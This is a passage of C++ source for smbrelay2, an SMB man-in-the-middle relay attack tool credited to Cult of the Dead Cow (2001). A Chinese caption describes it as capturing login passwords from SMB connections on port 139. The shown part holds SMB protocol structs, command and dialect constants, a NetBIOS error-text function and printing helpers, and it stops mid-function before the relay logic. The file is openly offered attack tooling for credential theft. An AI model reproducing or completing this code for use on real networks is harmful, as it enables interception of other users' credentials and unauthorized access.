smbrelay2.cpp

通过监听其他机器上139端口发来的smb连接请求来得到登录密码的程序例子

// smbrelay2.cpp : NetBIOS level SMB man-in-the-middle relay attack
//  Copyright 2001 Sir Dystic - Cult of the Dead Cow - sirdystic@cultdeadcow.com



#pragma comment( lib, "netapi32.lib" )


#include <windows.h>
#include <nb30.h>
#include <process.h>
#include <stdio.h>
#include <conio.h>



#pragma pack(1)

int g_LanaNum = 0;
BOOL g_LocalGroupName = FALSE;
DWORD g_FinalReadTimeout = 3000;
BOOL g_bQuit = FALSE;

int g_DebugLevel = 0;

#define SERVERDOMAINNAME	"PEE"

#define SMBMAGICVAL	MAKELONG(MAKEWORD(0xFF, 'S'), MAKEWORD('M', 'B') )
#define NULLNAME		"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
#define WILDCARDNAME	"*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"

#define NBCheck(x, s)  if (NRC_GOODRET != x.ncb_retcode) { fprintf(stderr, "Line %d:%s: Got 0x%x from Netbios(): %s\n", __LINE__, s, x.ncb_retcode, NBErrorTxt(x.ncb_retcode));	}

#define DATAGRAMBUFFERSIZE 16384

typedef struct {
	DWORD MagicVal;
	BYTE Command;
	union 
	{
		struct 
		{
			BYTE ErrorClass;
			BYTE Reserved;
			WORD ErrorCode;
		};
		DWORD NTError;
	};
	// flags field
	BYTE bLockAndReadWriteAndUnlock:1;
	BYTE bSendWithoutAck:1;
	BYTE bReservedBit:1;
	BYTE bNoCaseSensitivePaths:1;
	BYTE bCanonicalizedPaths:1;
	BYTE bOpportunisticLocks:1;
	BYTE bChangeNotify:1;
	BYTE bResponse:1;
	// 2nd flags field
	BYTE bLongFilenames:1;
	BYTE bExtendedAttributes:1;
	BYTE bFlags2IsLongName:1;
	BYTE bUnknown1:1;
	BYTE bUnknown2:1;
	BYTE bUnknown3:1; //***
	BYTE bUnknown4:1;
	BYTE bUnknown5:1; //***

	BYTE bUnknown6:1;
	BYTE bUnknown7:1;
	BYTE bUnknown8:1;
	BYTE bExtendedSecurity:1;
	BYTE bResolveViaDFS:1;
	BYTE bReadGrantedWithExecPerms:1;
	BYTE bNTErrorCodes:1;
	BYTE bUnicodeStrings:1;

	WORD PID;
	DWORD HdrReserved;
	WORD SessionID;
	WORD SequenceNumber;


	BYTE Padding[2];
	WORD TreeID;
	WORD CallersProcess;
	WORD UserID;
	WORD MultiplexID;
} SMBHEADER, *PSMBHEADER;


typedef struct {
	BYTE Len;		// should be 17
	WORD DialectIndex;
	BYTE bUserLevelSecurity:1;
	BYTE bEncryptPasswords:1;
	BYTE bSecuritySignaturesEnabled:1;
	BYTE bSecuritySignaturesRequired:1;
	BYTE bReserved:4;
	WORD MaxPendingMpxRequests;
	WORD MaxVCsInClientAndServer;
	DWORD MaxTransmitBufferSize;
	DWORD MaxRawBufferSize;
	DWORD UniqueSessionKey;
	BYTE bReadAndWriteRawMode:1;
	BYTE bReadAndWriteMultiplexMode:1;
	BYTE bUnicode:1;
	BYTE bLargeFiles:1;
	BYTE bNTLM012Dialect:1;
	BYTE bRAPIviaRPC:1;
	BYTE bNT32BitStatus:1;
	BYTE bLevelIIOplocks:1;

	BYTE bLOCK_AND_READ_Command:1;
	BYTE bNT_FIND_SBM_Command:1;
	BYTE Unused1:2;
	BYTE bDFSAware:1;
	BYTE Unused2:3;

	BYTE Unused3;

	BYTE Unused4:5;
	BYTE bBulkTransfer:1;
	BYTE bCompressedData:1;
	BYTE bExtendedSecurity:1;

	DWORD SystemDate;
	DWORD SystemTime;
	WORD TimeZone;
	BYTE EncryptionKeyLen;
	WORD ByteCount;
} SMBDIALECTSELECTHEADER, *PSMBDIALECTSELECTHEADER;

#define SMBDIALECTSELECTHEADER_LEN			17



typedef struct 
{
	BYTE Len;	// should be 10
	BYTE AndXCommand;
	BYTE AndXReserved;
	WORD AndXOffset;
	WORD MaxBufferSize;
	WORD MaxMpxCount;
	WORD VcNumber;	// 0 = first (only), nonzero=additional VC number
	DWORD SessionKey;
	WORD PasswordLen;
	DWORD Reserved;
	WORD ByteCount;
} SESSION_SETUP_ANDHEADER, *PSESSION_SETUP_ANDHEADER;

#define SESSION_SETUP_ANDHEADER_LEN 10



typedef struct 
{
	BYTE Len;	// should be 13
	BYTE AndXCommand;
	BYTE AndXReserved;
	WORD AndXOffset;
	WORD MaxBufferSize;
	WORD MaxMpxCount;
	WORD VcNumber;	// 0 = first (only), nonzero=additional VC number
	DWORD SessionKey;
	WORD CaseInsensitivePasswordLen;
	WORD CaseSensitivePasswordLen;
	DWORD Reserved;
	DWORD ClientCaps;
	WORD ByteCount;
} SESSION_SETUP_ANDHEADER2, *PSESSION_SETUP_ANDHEADER2;

#define SESSION_SETUP_ANDHEADER2_LEN 13

typedef struct 
{
	BYTE Len;	// should be 12
	BYTE AndXCommand;
	BYTE AndXReserved;
	WORD AndXOffset;
	WORD MaxBufferSize;
	WORD MaxMpxCount;
	WORD VcNumber;	// 0 = first (only), nonzero=additional VC number
	DWORD SessionKey;
	WORD SecurityBlobLen;
	DWORD Reserved;
	DWORD ClientCaps;
	WORD ByteCount;
} SESSION_SETUP_ANDHEADER2EX, *PSESSION_SETUP_ANDHEADER2EX;

#define SESSION_SETUP_ANDHEADER2EX_LEN 12

typedef struct
{
	BYTE Len;	// should be 3
	BYTE AndXCommand;
	BYTE AndXReserved;
	WORD AndXOffset;
	WORD Action;
	WORD ByteCount;
} SESSION_SETUP_ANDRESPONSEHEADER, *PSESSION_SETUP_ANDRESPONSEHEADER;
// followed by
// SZ Server native OS
// SZ Server native LanMan
// SZ Server primary domain

#define SESSION_SETUP_ANDRESPONSEHEADER_LEN 3

typedef struct
{
	BYTE Len;	// should be 4
	BYTE AndXCommand;
	BYTE AndXReserved;
	WORD AndXOffset;
	WORD Flags;
	WORD PasswordLen;
	WORD ByteCount;
} TREE_CONNECT_ANDHEADER, *PTREE_CONNECT_ANDHEADER;

#define TREE_CONNECT_ANDHEADER_LEN 4


typedef struct
{
	BYTE Len;	// should be 3
	BYTE AndXCommand;
	BYTE AndXReserved;
	WORD AndXOffset;
	WORD OptionalSupport;
	WORD ByteCount;
} TREE_CONNECT_ANDRESPONSEHEADER, *PTREE_CONNECT_ANDRESPONSEHEADER;
// followed by
// SZ Servicetype connected to
// SZ NativeFileSystem

#define TREE_CONNECT_ANDRESPONSEHEADER_LEN 3


typedef struct 
{
	BYTE Len;	// should be 24
	BYTE AndXCommand;
	BYTE AndXReserved;
	WORD AndXOffset;
	BYTE Reserved;
	WORD NameLength;
	DWORD Flags;
	DWORD RootDirectoryFid;
	DWORD AccessMask;
	LARGE_INTEGER AllocationSize;
	DWORD ExtFileAttributes;
	DWORD ShareAccess;
	DWORD CreateDisposition;
	DWORD CreateOptions;
	DWORD ImpersonationLevel;
	BYTE SecurityFlags;
	WORD ByteCount;
} NT_CREATE_ANDHEADER, *PNT_CREATE_ANDHEADER;

#define NT_CREATE_ANDHEADER_LEN 24

#define TYPE_SESSION_MESSAGE			0x00
#define TYPE_SESSION_REQUEST			0x81
#define TYPE_POSITIVE_SESSION_RESPONSE	0x82
#define TYPE_NEGATIVE_SESSION_RESPONSE	0x83
#define TYPE_RETARGET_SESSION_RESPONSE	0x84
#define TYPE_SESSION_KEEP_ALIVE			0x85

#define SMB_COM_CREATE_DIRECTORY		0x00
#define SMB_COM_DELETE_DIRECTORY		0x01
#define SMB_COM_OPEN					0x02
#define SMB_COM_CREATE					0x03
#define SMB_COM_CLOSE					0x04 
#define SMB_COM_FLUSH					0x05 
#define SMB_COM_DELETE					0x06 
#define SMB_COM_RENAME					0x07 
#define SMB_COM_QUERY_INFORMATION		0x08 
#define SMB_COM_SET_INFORMATION			0x09 
#define SMB_COM_READ					0x0A 
#define SMB_COM_WRITE					0x0B 
#define SMB_COM_LOCK_BYTE_RANGE			0x0C 
#define SMB_COM_UNLOCK_BYTE_RANGE		0x0D 
#define SMB_COM_CREATE_TEMPORARY		0x0E 
#define SMB_COM_CREATE_NEW				0x0F 
#define SMB_COM_CHECK_DIRECTORY			0x10 
#define SMB_COM_PROCESS_EXIT			0x11 
#define SMB_COM_SEEK					0x12 
#define SMB_COM_LOCK_AND_READ			0x13 
#define SMB_COM_WRITE_AND_UNLOCK		0x14 
#define SMB_COM_READ_RAW				0x1A 
#define SMB_COM_READ_MPX				0x1B 
#define SMB_COM_READ_MPX_SECONDARY		0x1C 
#define SMB_COM_WRITE_RAW				0x1D 
#define SMB_COM_WRITE_MPX				0x1E 
#define SMB_COM_WRITE_COMPLETE			0x20 
#define SMB_COM_SET_INFORMATION2		0x22 
#define SMB_COM_QUERY_INFORMATION2		0x23 
#define SMB_COM_LOCKING_ANDX			0x24 
#define SMB_COM_TRANSACTION				0x25 
#define SMB_COM_TRANSACTION_SECONDARY	0x26 
#define SMB_COM_IOCTL					0x27 
#define SMB_COM_IOCTL_SECONDARY			0x28 
#define SMB_COM_COPY					0x29 
#define SMB_COM_MOVE					0x2A 
#define SMB_COM_ECHO					0x2B 
#define SMB_COM_WRITE_AND_CLOSE			0x2C 
#define SMB_COM_OPEN_ANDX				0x2D 
#define SMB_COM_READ_ANDX				0x2E 
#define SMB_COM_WRITE_ANDX				0x2F 
#define SMB_COM_CLOSE_AND_TREE_DISC		0x31 
#define SMB_COM_TRANSACTION2			0x32 
#define SMB_COM_TRANSACTION2_SECONDARY	0x33 
#define SMB_COM_FIND_CLOSE2				0x34 
#define SMB_COM_FIND_NOTIFY_CLOSE		0x35 
#define SMB_COM_TREE_CONNECT			0x70 
#define SMB_COM_TREE_DISCONNECT			0x71 
#define SMB_COM_NEGOTIATE               0x72
#define SMB_COM_SESSION_SETUP_ANDX      0x73
#define SMB_COM_LOGOFF_ANDX             0x74
#define SMB_COM_TREE_CONNECT_ANDX       0x75
#define SMB_COM_QUERY_INFORMATION_DISK  0x80
#define SMB_COM_SEARCH                  0x81
#define SMB_COM_FIND                    0x82
#define SMB_COM_FIND_UNIQUE             0x83
#define SMB_COM_NT_TRANSACT             0xA0
#define SMB_COM_NT_TRANSACT_SECONDARY   0xA1
#define SMB_COM_NT_CREATE_ANDX          0xA2
#define SMB_COM_NT_CANCEL               0xA4
#define SMB_COM_OPEN_PRINT_FILE         0xC0
#define SMB_COM_WRITE_PRINT_FILE        0xC1
#define SMB_COM_CLOSE_PRINT_FILE        0xC2
#define SMB_COM_GET_PRINT_QUEUE         0xC3
#define SMB_COM_READ_BULK               0xD8
#define SMB_COM_WRITE_BULK              0xD9
#define SMB_COM_WRITE_BULK_DATA         0xDA

#define SMB_NONE						0xFF

// The original MSNET SMB protocol (otherwise known as the "core protocol")
#define LANMANDIALECT_PCNETWORKPROGRAM10 "PC NETWORK PROGRAM 1.0" 
// Some versions of the original MSNET defined this as an alternate to the core protocol name
#define LANMANDIALECT_PCLAN10 "PCLAN1.0" 
// This is used for the MS-NET 1.03 product.  It defines Lock&Read,Write&Unlock, and a special version of raw read and raw write.
#define LANMANDIALECT_MICROSOFTNETWORKS103 "MICROSOFT NETWORKS 1.03" 
// This is the  DOS LANMAN 1.0 specific protocol.  It is equivalent to the LANMAN 1.0 protocol, except the server is required to map errors from the OS/2 error to an appropriate DOS error.
#define LANMANDIALECT_MICROSOFTNETWORKS30  "MICROSOFT NETWORKS 3.0" 
// This is the first version of the full LANMAN 1.0 protocol
#define LANMANDIALECT_LANMAN10 "LANMAN1.0"
// This is the first version of the full LANMAN 2.0 protocol
#define LANMANDIALECT_LM12X002 "LM1.2X002"
// This is the DOS equivalent of the LM1.2X002 protocol.  It is identical to the LM1.2X002 protocol, but the server will perform error mapping to appropriate DOS errors.
#define LANMANDIALECT_DOSLM12X002 "DOS LM1.2X002"
// DOS LANMAN2.1
#define LANMANDIALECT_DOSLANMAN21 "DOS LANMAN2.1"
// OS/2 LANMAN2.1
#define LANMANDIALECT_LANMAN21 "LANMAN2.1"
// Windows for Workgroups Version 1.0
#define LANMANDIALECT_WFW31A "Windows for Workgroups 3.1a"
// The SMB protocol designed for NT networking.  This has special SMBs which duplicate the NT semantics.
#define LANMANDIALECT_NTLM012 "NT LM 0.12"



#define SMBENCRYPTIONKEYLEN 8


char *NBErrorTxt(int Er)
{
	char *Ret = "Unknown";

	switch (Er)
	{
	case NRC_GOODRET:
		Ret = "good return";
		break;
	case NRC_BUFLEN:
		Ret = "illegal buffer length";
		break;
	case NRC_ILLCMD:
		Ret = "illegal command";
		break;
	case NRC_CMDTMO:
		Ret = "command timed out";
		break;
	case NRC_INCOMP:
		Ret = "message incomplete, issue another command";
		break;
	case NRC_BADDR:
		Ret = "illegal buffer address";
		break;
	case NRC_SNUMOUT:
		Ret = "session number out of range";
		break;
	case NRC_NORES:
		Ret = "no resource available";
		break;
	case NRC_SCLOSED:
		Ret = "session closed";
		break;
	case NRC_CMDCAN:
		Ret = "command cancelled";
		break;
	case NRC_DUPNAME:
		Ret = "duplicate name";
		break;
	case NRC_NAMTFUL:
		Ret = "name table full";
		break;
	case NRC_ACTSES:
		Ret = "no deletions, name has active sessions";
		break;
	case NRC_LOCTFUL:
		Ret = "local session table full";
		break;
	case NRC_REMTFUL:
		Ret = "remote session table full";
		break;
	case NRC_ILLNN:
		Ret = "illegal name number";
		break;
	case NRC_NOCALL:
		Ret = "no callname";
		break;
	case NRC_NOWILD:
		Ret = "cannot put * in NCB_NAME";
		break;
	case NRC_INUSE:
		Ret = "name in use on remote adapter";
		break;
	case NRC_NAMERR:
		Ret = "name deleted";
		break;
	case NRC_SABORT:
		Ret = "session ended abnormally";
		break;
	case NRC_NAMCONF:
		Ret = "name conflict detected";
		break;
	case NRC_IFBUSY:
		Ret = "interface busy, IRET before retrying";
		break;
	case NRC_TOOMANY:
		Ret = "too many commands outstanding, retry later";
		break;
	case NRC_BRIDGE:
		Ret = "ncb_lana_num field invalid";
		break;
	case NRC_CANOCCR:
		Ret = "command completed while cancel occurring";
		break;
	case NRC_CANCEL:
		Ret = "command not valid to cancel";
		break;
	case NRC_DUPENV:
		Ret = "name defined by anther local process";
		break;
	case NRC_ENVNOTDEF:
		Ret = "environment undefined. RESET required";
		break;
	case NRC_OSRESNOTAV:
		Ret = "required OS resources exhausted";
		break;
	case NRC_MAXAPPS:
		Ret = "max number of applications exceeded";
		break;
	case NRC_NOSAPS:
		Ret = "no saps available for netbios";
		break;
	case NRC_NORESOURCES:
		Ret = "requested resources are not available";
		break;
	case NRC_INVADDRESS:
		Ret = "invalid ncb address or length > segment";
		break;
	case NRC_INVDDID:
		Ret = "invalid NCB DDID";
		break;
	case NRC_LOCKFAIL:
		Ret = "lock of user area failed";
		break;
	case NRC_OPENERR:
		Ret = "NETBIOS not loaded";
		break;
	case NRC_SYSTEM:
		Ret = "system error";
		break;
	case NRC_PENDING:
		Ret = "asynchronous command is not yet finished";
		break;
	}
	return Ret;
}

void PrintNetBIOSName(unsigned char *name)
{
	BYTE BinVal;
	char PrintName[NCBNAMSZ];
	int x;

	memcpy(PrintName, name, NCBNAMSZ-1);
	PrintName[NCBNAMSZ-1] = 0;

	BinVal = name[NCBNAMSZ-1];

	fprintf(stderr, "%s", PrintName);

	for (x = 0; x < NCBNAMSZ - (int)strlen(PrintName); x++)
		fprintf(stderr, " ");
	
	fprintf(stderr, "<%02x>", BinVal);
}


void ParamToNetBIOSName(char *dest, char *src)
{
	int x, len;
	char *tmpptr;
	char *BinValPtr = strchr(src, '\\');

	if (BinValPtr != NULL)
	{
		*BinValPtr = 0;
		tmpptr = BinValPtr - 1;
	} 
	else 
	{
		tmpptr = src + strlen(src) - 1;	// point to last char in string
	}

	while (tmpptr > src && *tmpptr == ' ')
	{
		*tmpptr = 0;
		tmpptr--;
	}

	len = strlen(src);

	if (len > NCBNAMSZ-1) len = NCBNAMSZ-1;

	if (strcmp(src, WILDCARDNAME) == 0)
		memset(dest, 0, NCBNAMSZ-1);
	else
		memset(dest, ' ', NCBNAMSZ-1);

	memcpy(dest, src, len);

	if (BinValPtr != NULL)
	{
		dest[NCBNAMSZ-1] = (unsigned char)strtoul(BinValPtr+1, NULL, 16);
	}
	else 
		dest[NCBNAMSZ-1] = 0;

	// convert to upper case
	for (x = 0; x < NCBNAMSZ-1; x++)
		dest[x] = toupper(dest[x]);
	
}




void PrintHexString(BYTE *src, int len)
{
	int x;

	if (len == 0)
		return;

	for (x = 0; x < len; x++)
	{
		fprintf(stderr, "%02X",	*src);

		src++;
	}

	fprintf(stderr, " ");
}



const char *GetCommandType(BYTE Command)
{
	static char retbuff[64];
	char * ret = retbuff;

	switch(Command)